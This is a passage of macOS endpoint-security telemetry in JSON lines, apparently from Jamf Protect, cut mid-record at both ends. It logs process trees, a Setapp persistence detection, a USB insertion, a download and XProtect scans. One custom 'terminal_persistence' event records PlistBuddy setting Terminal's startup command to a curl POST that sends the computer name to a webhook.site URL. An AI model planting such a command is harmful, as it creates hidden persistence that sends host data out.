error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33261,"path":"/bin/zsh","size":1377584,"inode":1152921500312501200,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"959ade1e4967a51eb8757d723d5040090fdfcb5c","accessed":1694870910,"modified":1694870910,"sha256hex":"ccb1ba009baa2353c3806fe4f56349497b542104b5104e7a82b8f8ce2304ec03","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.zsh","cdhash":"f8w59TUpUrUhesGyuRBvXldP3Q0=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":35181,"path":"/usr/bin/login","size":172032,"inode":1152921500312502100,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"875c999ee4df1a16d7654636714f852f55d1cc57","accessed":1694870910,"modified":1694870910,"sha256hex":"4fa5b402145c8228454641e232d3d4b4152df143bf3ffda98d75c200e661baf4","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.login","cdhash":"MnR8eKbXO4v5eUokTXLWEDUfCVY=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":["com.apple.private.endpoint-security.submit.login","com.apple.private.security.clear-library-validation"],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777230,"mode":33261,"path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","size":2222656,"inode":1152921500311913100,"xattrs":[],"changed":1694870910,"created":1694870910,"sha1hex":"14c2df1ea5a91fed7527fcfdff74268e19524eb3","accessed":1694870910,"modified":1694870910,"sha256hex":"17a6a338efd6052c871a6da90b81c483a3edea43c056326587735b89feaf189c","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.Terminal","cdhash":"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false}],"processes":[{"gid":0,"pid":3136,"tty":"/dev/ttys016","uid":0,"args":["/usr/libexec/security_authtrampoline","/Library/Application Support/JAMF/Remote Assist/Wipe","auth 16"],"name":"security_authtrampoline","path":"/usr/libexec/security_authtrampoline","pgid":3096,"ppid":3099,"rgid":0,"ruid":0,"uuid":"c821d617-2ce5-4475-aae6-c428a1ad9e8c","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.security_authtrampoline","cdhash":"rbIoddPMz9MoMMZl1ATihY8wlMk=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841238,"originalParentPID":3099,"processIdentifier":6750},{"gid":0,"pid":3099,"tty":"/dev/ttys016","uid":0,"args":["/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher","/operation=connector.uninstall"],"name":"jamfRemoteAssistLauncher","path":"/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher","pgid":3096,"ppid":3098,"rgid":0,"ruid":0,"uuid":"a382cfda-8964-4388-8c19-49d4eaef2ae7","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.jamf.remoteassist.launcher","cdhash":"OkjDuX0cFaDreH32s6FfHKg1FqE=","status":0,"teamid":"483DWKW443","signerType":2,"authorities":["Developer ID Application: JAMF Software (483DWKW443)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841236,"originalParentPID":3098,"processIdentifier":6654},{"gid":20,"pid":3098,"tty":"/dev/ttys016","uid":0,"args":["sudo","/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistLauncher","/operation=connector.uninstall"],"name":"sudo","path":"/usr/bin/sudo","pgid":3096,"ppid":3096,"rgid":20,"ruid":501,"uuid":"31060be9-a210-4e18-bec5-2b0b6c482563","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.sudo","cdhash":"LZl8hBA1BePrgPrqw+Ap/HR6YUg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841234,"originalParentPID":3096,"processIdentifier":6652},{"gid":20,"pid":3096,"tty":"/dev/ttys016","uid":501,"args":["/bin/sh","/Library/Application Support/JAMF/Remote Assist/Uninstall"],"name":"bash","path":"/bin/bash","pgid":3096,"ppid":3063,"rgid":20,"ruid":501,"uuid":"6600050c-406a-4cd6-8c31-1eefe04fea65","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.bash","cdhash":"w8D5iqHkJJxjGQGuFQLtfzG2Wes=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841233,"originalParentPID":3063,"processIdentifier":6650},{"gid":20,"pid":3063,"uid":501,"args":["-zsh"],"name":"zsh","path":"/bin/zsh","pgid":3063,"ppid":3062,"rgid":20,"ruid":501,"uuid":"f596588c-0db5-4fdb-bd64-95584398c596","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.zsh","cdhash":"f8w59TUpUrUhesGyuRBvXldP3Q0=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841233,"originalParentPID":3062,"processIdentifier":6608},{"gid":20,"pid":3062,"uid":0,"args":["login","-pf","local-admin"],"name":"login","path":"/usr/bin/login","pgid":3062,"ppid":765,"rgid":20,"ruid":501,"uuid":"bfd4dcd0-5054-4cab-9b8f-1e650d977771","flags":[],"processType":"GPSystemObject","signingInfo":{"appid":"com.apple.login","cdhash":"MnR8eKbXO4v5eUokTXLWEDUfCVY=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":["com.apple.private.endpoint-security.submit.login","com.apple.private.security.clear-library-validation"],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698841233,"originalParentPID":765,"processIdentifier":6606},{"gid":20,"pid":765,"uid":501,"args":["/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"],"name":"Terminal","path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","pgid":765,"ppid":1,"rgid":20,"ruid":501,"uuid":"7fb1cc18-b1a9-467a-880a-3a6e86960880","flags":[],"appPath":"/System/Applications/Utilities/Terminal.app","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.Terminal","cdhash":"wW5ML2vzWxs1MRJgpzVfrYJJ/GU=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"inheritedFlags":[],"responsiblePID":765,"startTimestamp":1698840671,"originalParentPID":1,"processIdentifier":1812}]},"eventType":"GPProcessEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.3 (Build 23D56)","ips":["175.16.199.3"],"serial":"Z41L97RNJT","hostname":"VMAC-41L97RNJT","protectVersion":"5.1.3.4","provisioningUDID":"0000FE00-2134CAD3E728E967"},"match":{"tags":[],"uuid":"4ecfd2ae-0f05-4b5d-8079-85f43d72ccf4","event":{"dev":16777235,"gid":20,"pid":4645,"uid":501,"path":"/Users/john/Library/Preferences/com.apple.Terminal.plist","type":4,"uuid":"f3d53a7a-0946-4051-9ca7-0f1133f64d44","iNode":283232,"eventID":94737,"prevFile":null,"timestamp":1706707853.090055},"facts":[{"name":"terminal_persistence","tags":[],"uuid":"3184a930-51cb-490b-862a-631984ffdd61","human":"","actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Test","value":"curl -X POST -H Content-Type: application/json -d {\"computer_name\": \"VMAC-41L97RNJT\"} https://webhook.site/33654518-7909-455f-ab94-2b981036b12e","valueType":"String"}],"version":0,"severity":0}],"custom":true,"actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"Test","value":"curl -X POST -H Content-Type: application/json -d {\"computer_name\": \"VMAC-41L97RNJT\"} https://webhook.site/33654518-7909-455f-ab94-2b981036b12e","valueType":"String"}],"severity":0},"related":{"files":[{"gid":20,"uid":501,"fsid":16777235,"mode":33152,"path":"/Users/john/Library/Preferences/com.apple.Terminal.plist","size":29235,"inode":283232,"xattrs":[],"changed":1706707853,"created":1706706812,"sha1hex":"4410ab912212c5e196f063b5bb62b837c334e78d","accessed":1706707839,"modified":1706707853,"sha256hex":"9ea2625bca753b36d358be22abb4ca672a538b80ec2b9de527f6beb2c961e245","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"","status":-67062,"teamid":"","signerType":4,"authorities":[],"entitlements":[],"statusMessage":"code object is not signed at all"},"isScreenShot":false}],"users":[{"uid":501,"name":"john","uuid":"Z41L97RNJT1f5"},{"uid":0,"name":"root","uuid":"Z41L97RNJT0"}],"groups":[{"gid":20,"name":"staff","uuid":"Z41L97RNJT14"},{"gid":0,"name":"wheel","uuid":"Z41L97RNJT0"}],"binaries":[{"gid":0,"uid":0,"fsid":16777235,"mode":33261,"path":"/usr/libexec/PlistBuddy","size":172944,"inode":1152921500312512000,"xattrs":[],"changed":1705043980,"created":1705043980,"sha1hex":"4f6dcbbb78f2015ce796756638bfa8ae3831d5ca","accessed":1705043980,"modified":1705043980,"sha256hex":"5f9a5f0fde9f19d3493100d85a4faa9e2f7f08112ec4bd82a7dce4ea69de0f4e","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.PlistBuddy","cdhash":"Pe0mLw80dA9JhyUi6NwOQ1HUCIg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777235,"mode":33261,"path":"/bin/zsh","size":1377584,"inode":1152921500312509300,"xattrs":[],"changed":1705043980,"created":1705043980,"sha1hex":"c31a403b3ee1dd54687ac76e8148ebe63efa6c79","accessed":1705043980,"modified":1705043980,"sha256hex":"7c1e6c42ee5929a7c00541df426f1daca4b0e4badd651fc4d5d31dae12ed4ae5","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.zsh","cdhash":"pYH97FjkFzzp4d/qQ19W3VBlRso=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false},{"gid":0,"uid":0,"fsid":16777235,"mode":33261,"path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","size":2222704,"inode":1152921500311913500,"xattrs":[],"changed":1705043980,"created":1705043980,"sha1hex":"5550c411a1ffaa049a1f567fe1ca328eb4c6136f","accessed":1705043980,"modified":1705043980,"sha256hex":"632d75df346a43181dee53823a97e9947a9588be5665a5630acb92b6346002f3","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"com.apple.Terminal","cdhash":"j6TTFNtMluURvtl5bNlNBpr3C94=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"isScreenShot":false}],"processes":[{"gid":20,"pid":4645,"tty":"/dev/ttys000","uid":501,"args":["/usr/libexec/PlistBuddy","-c","Set :\"Window Settings\":Basic:CommandString 'curl -X POST -H \"Content-Type: application/json\" -d \"{\\\"computer_name\\\": \\\"VMAC-41L97RNJT\\\"}\" https://webhook.site/33654518-7909-455f-ab94-2b981036b12e'","/Users/john/Library/Preferences/com.apple.Terminal.plist"],"name":"PlistBuddy","path":"/usr/libexec/PlistBuddy","ppid":4204,"rgid":20,"ruid":501,"uuid":"76d0dd90-7aa2-418a-8f87-f3b21a83bb6c","flags":[],"objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.PlistBuddy","cdhash":"Pe0mLw80dA9JhyUi6NwOQ1HUCIg=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"groupLeaderPID":4645,"inheritedFlags":[],"responsiblePID":3555,"startTimestamp":1706707853,"isPlatformBinary":true,"originalParentPID":4204,"processIdentifier":12032},{"gid":20,"pid":4204,"uid":501,"args":["/bin/zsh","-zsh"],"name":"zsh","path":"/bin/zsh","ppid":null,"rgid":20,"ruid":501,"uuid":"8afa3e04-ab59-48f1-87fa-bd42b2b1e71c","flags":[],"objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.zsh","cdhash":"pYH97FjkFzzp4d/qQ19W3VBlRso=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"groupLeaderPID":null,"inheritedFlags":[],"responsiblePID":3555,"startTimestamp":1706706702,"isPlatformBinary":true,"processIdentifier":10878},{"gid":20,"pid":3555,"uid":501,"args":["/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"],"name":"Terminal","path":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal","ppid":null,"rgid":20,"ruid":501,"uuid":"9508ca43-ad50-408c-a959-8131ac29bbf2","flags":[],"appPath":"/System/Applications/Utilities/Terminal.app","objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"com.apple.Terminal","cdhash":"j6TTFNtMluURvtl5bNlNBpr3C94=","status":0,"teamid":"","signerType":0,"authorities":["Software Signing","Apple Code Signing Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"groupLeaderPID":null,"inheritedFlags":[],"responsiblePID":3555,"startTimestamp":1706706139,"isPlatformBinary":true,"processIdentifier":9395}]},"eventType":"GPFSEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.2 (Build 23C5030f)","ips":["175.16.199.4"],"serial":"C02ZW0GTLVDL","hostname":"LMAC-ZW0GTLVDL","protectVersion":"5.1.3.4","provisioningUDID":"32EC79C5-26DC-535A-85F7-986F063297E2"},"match":{"tags":["MITREattack","BootOrLogonAutostartExecution","T1547","Visibility","Persistence"],"uuid":"0090c24f-dcab-44f0-9395-1c2f5e688d4b","event":{"dev":16777221,"gid":20,"pid":64885,"uid":501,"path":"/Applications/Setapp.app","type":3,"uuid":"03fedbe6-7160-47f0-b05b-5eddb070c1c9","iNode":22894871,"eventID":114853,"prevFile":"/Users/thijs/Library/Caches/com.setapp.DesktopClient/org.sparkle-project.Sparkle/Installation/jmPimIOZQ/Setapp.app","timestamp":1706141601.459138},"facts":[{"name":"DockTileAdded","tags":["Persistence","BootOrLogonAutostartExecution","MITREattack","T1547"],"uuid":"24fcb4dc-5720-422d-9801-42b1e7b7b291","human":"New Dock Tile registered","actions":[{"name":"Report"},{"name":"CacheFile"}],"context":[{"name":"Plugin Name","value":"DockTilePlugIn.docktileplugin","valueType":"String"}],"version":1,"severity":1},{"name":"CustomURLHandlerCreation","tags":["Visibility"],"uuid":"25a295ca-f4b3-4f78-8faa-80e9182645f1","human":"Application that uses custom url handler created","actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"Setapp Discovery\";\n CFBundleURLSchemes = (\n setappDiscovery\n );\n}","valueType":"String"},{"name":"Signer","value":"2","valueType":"String"}],"version":1,"severity":0}],"custom":false,"actions":[{"name":"CacheFile"},{"name":"Report"}],"context":[{"name":"BundleURLTypes","value":"{\n CFBundleTypeRole = Editor;\n CFBundleURLName = \"Setapp Discovery\";\n CFBundleURLSchemes = (\n setappDiscovery\n );\n}","valueType":"String"},{"name":"Signer","value":"2","valueType":"String"},{"name":"Plugin Name","value":"DockTilePlugIn.docktileplugin","valueType":"String"}],"severity":1},"related":{"files":[{"gid":20,"uid":501,"fsid":16777221,"mode":16877,"path":"/Applications/Setapp.app","size":96,"inode":22894871,"xattrs":["com.apple.macl"],"changed":1706141601,"created":1705697281,"sha1hex":"","accessed":1706141601,"modified":1706141601,"sha256hex":"","isDownload":false,"objectType":"GPSystemObject","isAppBundle":true,"isDirectory":true,"signingInfo":{"appid":"com.setapp.DesktopClient","cdhash":"qvvsGItML7v58RDPg/X5hVTNpnc=","status":0,"teamid":"MEHY5QF425","signerType":2,"authorities":["Developer ID Application: Setapp Limited (MEHY5QF425)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error."},"isScreenShot":false}],"users":[{"uid":501,"name":"","uuid":"C02ZW0GTLVDL1f5"}],"groups":[{"gid":20,"name":"","uuid":"C02ZW0GTLVDL14"}],"binaries":[{"gid":20,"uid":501,"fsid":16777221,"mode":33261,"path":"/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate","size":644320,"inode":22649007,"xattrs":[],"changed":1705545903,"created":1704995932,"sha1hex":"e9a46b7ad0356aa655baa324d67b6abc762820df","accessed":1706141343,"modified":1704995932,"sha256hex":"f6d8bd4d2864ec71c6628fe803458da6d7737575cde62e5044645de692e9e748","isDownload":false,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"Autoupdate-555549446afbe33f0c8f39a58f46e1bd35e14c86","cdhash":"7hIQIEZBRQk0gujH3AlD7AhJaMY=","status":0,"teamid":"MEHY5QF425","signerType":2,"authorities":["Developer ID Application: Setapp Limited (MEHY5QF425)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error."},"isScreenShot":false}],"processes":[{"gid":20,"pid":64885,"uid":501,"args":["/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate","com.setapp.DesktopClient","/Users/thijs","thijs"],"name":"Autoupdate","path":"/Users/thijs/Library/Application Support/Setapp/LaunchAgents/SetappUpdater.app/Contents/Frameworks/Sparkle.framework/Versions/B/Autoupdate","ppid":1,"rgid":20,"ruid":501,"uuid":"b1b340e9-4fd9-4cdf-8602-cf7796828926","flags":[],"objectType":"GPSystemObject","processType":"GPSystemObject","signingInfo":{"appid":"Autoupdate-555549446afbe33f0c8f39a58f46e1bd35e14c86","cdhash":"7hIQIEZBRQk0gujH3AlD7AhJaMY=","status":0,"teamid":"MEHY5QF425","signerType":2,"authorities":["Developer ID Application: Setapp Limited (MEHY5QF425)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error.","informationStage":"extended"},"groupLeaderPID":64885,"inheritedFlags":[],"responsiblePID":64885,"startTimestamp":1706141342,"isPlatformBinary":false,"originalParentPID":1,"processIdentifier":1808779}]},"eventType":"GPFSEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.2 (Build 23C5030f)","ips":["175.16.199.5"],"serial":"C02ZW0GTLVDL","hostname":"LMAC-ZW0GTLVDL","protectVersion":"5.1.3.4","provisioningUDID":"32EC79C5-26DC-535A-85F7-986F063297E2"},"match":{"tags":["Visibility"],"uuid":"db492c7c-a301-43ab-afa3-fc02f661918f","event":{"type":0,"uuid":"4ff5757b-5ba8-460d-97f8-3689a76a7bc0","device":{"size":15376000000,"unit":1,"isLeaf":false,"bsdName":"disk3","bsdUnit":3,"busName":"XHC3","busPath":"IODeviceTree:/PCI0@0/RP09@1D/UPSB@0/DSB2@2/XHC3@0","content":"GUID_partition_scheme","isWhole":true,"bsdMajor":1,"bsdMinor":13,"protocol":"USB","revision":"1.00","vendorId":"0x0781","blockSize":512,"mediaKind":"IOMedia","mediaName":"SanDisk Ultra USB 3.0 Media","mediaPath":"IODeviceTree:/PCI0@0/RP09@1D/UPSB@0/DSB2@2/XHC3@0/@1:0","productId":"0x5595","devicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP09@1D/IOPP/UPSB@0/IOPP/DSB2@2/IOPP/XHC3@0/XHC3@01000000/SSP1@01100000/Ultra USB 3.0@01100000/IOUSBHostInterface@0/IOUSBMassStorageInterfaceNub/IOUSBMassStorageDriverNub/IOUSBMassStorageDriver/IOSCSILogicalUnitNub@0/IOSCSIPeripheralDeviceType00/IOBlockStorageServices","isInternal":false,"isWritable":true,"vendorName":"SanDisk","deviceClass":0,"deviceModel":"Ultra USB 3.0","isEjectable":true,"isEncrypted":false,"isMountable":false,"isRemovable":true,"productName":"Ultra USB 3.0","serialNumber":"4C531001410227100573","deviceSubClass":0,"isNetworkVolume":false,"encryptionDetail":0},"timestamp":1705519180.1462169,"usbAddress":1},"facts":[{"name":"USBInserted","tags":["Visibility"],"uuid":"b4fe77b3-f8d3-483d-ba29-ea2e1a5c44ea","human":"USB device inserted","actions":[{"name":"Report"}],"context":[],"version":1,"severity":0}],"custom":false,"actions":[{"name":"Report"}],"context":[],"severity":0},"related":{"files":[],"users":[],"groups":[],"binaries":[],"processes":[]},"eventType":"GPUSBEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"host":{"os":"Version 14.0 (Build 23A344)","ips":["175.16.199.6"],"serial":"Z2C23RW4DY","hostname":"VMAC-2C23RW4DY","protectVersion":"5.0.2.2","provisioningUDID":"0000FE00-8406CE28ECFC4DAB"},"match":{"tags":[],"uuid":"7288b17d-d2d1-4de7-b76a-df3529cfe0a8","event":{"path":"/Users/local-admin/Downloads/JamfConnect-2.27.0.dmg","uuid":"5ff8ca5c-7e37-4610-8325-7fbddeea31cd","timestamp":1695888798.877483},"facts":[{"name":"new_downloads","tags":[],"uuid":"e5faa7fe-a10b-461c-9bc3-b3080bb59f4a","human":"","actions":[{"name":"Report","parameters":{}}],"context":[],"version":0,"severity":0}],"custom":true,"actions":[{"name":"Report","parameters":{}}],"context":[],"severity":0},"related":{"files":[{"gid":20,"uid":501,"fsid":16777232,"mode":33188,"path":"/Users/local-admin/Downloads/JamfConnect-2.27.0.dmg","size":35249769,"inode":3900740,"xattrs":["com.apple.macl","com.apple.metadata:kMDItemDownloadedDate","com.apple.metadata:kMDItemWhereFroms","com.apple.quarantine"],"changed":1695888797,"created":1695888795,"sha1hex":"0a5f0aa7cbe904e687341e2eee453348e3a3760d","accessed":1695888795,"modified":1695888797,"sha256hex":"f7688a83f2c508c16128bd512e1d57b122824001a0c560b12b63c26d3cb7f4a0","isDownload":true,"objectType":"GPSystemObject","isAppBundle":false,"isDirectory":false,"signingInfo":{"appid":"JamfConnect-2","cdhash":"sqTVmnuWCrCwmriUwwrilesPYME=","status":0,"teamid":"483DWKW443","signerType":2,"authorities":["Developer ID Application: JAMF Software (483DWKW443)","Developer ID Certification Authority","Apple Root CA"],"entitlements":[],"statusMessage":"No error."},"isScreenShot":false,"downloadedFrom":["https://files.jamfconnect.com/JamfConnect.dmg"]}],"users":[{"uid":501,"name":"local-admin","uuid":"Z2C23RW4DY1f5"}],"groups":[{"gid":20,"name":"staff","uuid":"Z2C23RW4DY14"}],"binaries":[],"processes":[]},"eventType":"GPDownloadEvent"}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"PCJVW6XJGM","ips":["175.16.199.7"],"os":"Version 13.6.1 (Build 22G313)","protectVersion":"5.1.0.4","provisioningUDID":"00006000-000678310153401E","serial":"PCJVW6XJGM"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"XPEvent.structured","composedMessage":"{\"caused_by\":[],\"status_message\":\"NoThreatDetected\",\"status_code\":20,\"execution_duration\":0.7135159969329834}","name":"XProtect Remediator Scan Activity","process":"XProtectRemediatorGreenAcre","processIdentifier":6925,"processImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","sender":"XProtectRemediatorGreenAcre","senderImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","subsystem":"com.apple.XProtectFramework.PluginAPI","tags":["XProtect Remediator"],"timestamp":1699432944.315508,"uuid":"D64D34FA-D426-48A3-BFD3-286776C34618"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"XProtect Remediator Scan Activity","name":"XProtect Remediator Scan Activity","severity":0,"tags":["XProtect Remediator"],"uuid":"48C46122-898D-412D-A728-F8939F0F8017"}],"severity":0,"tags":["XProtect Remediator"],"uuid":"7E46E4CD-0999-44C7-8EEE-6AC21876126E"}}} +{"caid":"9344154b2323cbfdca098e408354212d4331ac3e9e538497aba0f766723661f7","certid":"312301bd32f3fc8f82c7d6e57814764ae751f171f37496407d8998a32892bcea","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"PCJVW6XJGM","ips":["175.16.199.8"],"os":"Version 13.6.1 (Build 22G313)","protectVersion":"5.1.0.4","provisioningUDID":"00006000-000678310153401E","serial":"PCJVW6XJGM"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"XPEvent.structured","composedMessage":"{\"caused_by\":[],\"status_message\":\"NoThreatDetected\",\"status_code\":20,\"execution_duration\":0.7135159969329834}","name":"XProtect Remediator Scan Activity","process":"XProtectRemediatorGreenAcre","processIdentifier":6925,"processImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","sender":"XProtectRemediatorGreenAcre","senderImagePath":"/Library/Apple/System/Library/CoreServices/XProtect.app/Contents/MacOS/XProtectRemediatorGreenAcre","subsystem":"com.apple.XProtectFramework.PluginAPI","tags":["XProtect Remediator"],"timestamp":1699432944.315508,"uuid":"D64D34FA-D426-48A3-BFD3-286776C34618"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"XProtect Remediator Scan Activity","name":"XProtect Remediator Scan Activity","severity":0,"tags":["XProtect Remediator"],"uuid":"48C46122-898D-412D-A728-F8939F0F8017"}],"severity":0,"tags":["XProtect Remediator"],"uuid":"7E46E4CD-0999-44C7-8EEE-6AC21876126E"}}} +{"caid":"095d122988c4e487ef0c538709ce033e2620f9d30751567d24bbf78b085b699c","certid":"ae4ef1351c2ad7535a1c3fde7d2152f3223984a19a8f2eb069bf729e9dc8d279","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"mike.test’s MacBook Pro","ips":["175.16.199.9","175.16.199.18"],"os":"Version 14.3 (Build 23D56)","protectVersion":"5.1.3.4","provisioningUDID":"00008103-001C70A61AA2001E","serial":"C02DP1M5Q05P"},"match":{"actions":[{"name":"Report"}],"context":[],"custom":false,"event":{"category":"XPEvent.structured","composedMessage":"{\"execution_duration\":0.0001779794692993164,\"status_code\":20,\"status_message\":\"NoThreatDetected\",\"caused_by\":[]}","name":"XProtect Remediator Scan Activity","process":"XProtectRemediatorWaterNet","processIdentifier":4052,"processImagePath":"\/Library\/Apple\/System\/Library\/CoreServices\/XProtect.app\/Contents\/MacOS\/XProtectRemediatorWaterNet","sender":"XProtectRemediatorWaterNet","senderImagePath":"\/Library\/Apple\/System\/Library\/CoreServices\/XProtect.app\/Contents\/MacOS\/XProtectRemediatorWaterNet","subsystem":"com.apple.XProtectFramework.PluginAPI","tags":["XProtect Remediator"],"timestamp":1706744375.695548,"uuid":"A2F90786-46F6-4856-B96F-B9B4F051F785"},"facts":[{"actions":[{"name":"Report"}],"context":[],"human":"XProtect Remediator Scan Activity","name":"XProtect Remediator Scan Activity","severity":0,"tags":["XProtect Remediator"],"uuid":"33F6DAB9-3CE9-4685-A622-68EDAA572D6C"}],"severity":0,"tags":["XProtect Remediator"],"uuid":"CE2F93FE-F786-4BBC-B893-3F98D82488A7"}}} +{"caid":"095d122988c4e487ef0c538709ce033e2620f9d30751567d24bbf78b085b699c","certid":"56e3fe5f85c4aeb8550d4258a337e0618508f7038c3bd02cb1aeec12f072e532","input":{"eventType":"GPUnifiedLogEvent","host":{"hostname":"Mike’s Virtual Machine","ips":["175.16.199.10"],"os":"Version 14.2.1 (Build 